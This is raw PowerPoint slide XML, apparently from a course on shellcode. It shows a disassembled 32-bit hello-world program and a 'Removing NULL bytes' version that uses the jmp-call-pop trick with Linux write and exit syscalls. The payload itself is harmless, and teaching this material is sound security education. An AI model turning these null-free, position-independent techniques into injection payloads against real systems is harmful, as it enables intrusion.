              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -b32 helloworld1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000  E80F000000        call 0x14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000005  48                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000006  656C              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>insb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000008  6C                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>insb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000009  6F                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>outsd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000A  2C20              sub al,0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000C  776F              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x7d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000E  726C              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x7c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  64210A            and [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fs:edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000013  0D59B80400        or eax,0x4b859</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000018  0000              add [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>],al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001A  BB01000000        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ebx,0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001F  BA0F000000        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> edx,0xf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000024  CD80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000026  B801000000        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> eax,0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000002B  BB00000000        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ebx,0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000030  CD80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128751332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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Helloworld2</a:t>
            </a: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smtClean="0"/>
              <a:t>Removing NULL bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="3167534"/>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000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BITS 32             ;  Tell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> this is 32-bit code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> short one       ;  Jump down to a call at the end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>two:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssize_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> void *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ;  Pop the return address (string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 4        ;  Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1        ;  STDOUT file descriptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 15       ;  Length of the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ;  Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: write(1, string, 14)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; void _exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> status);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1        ; Exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
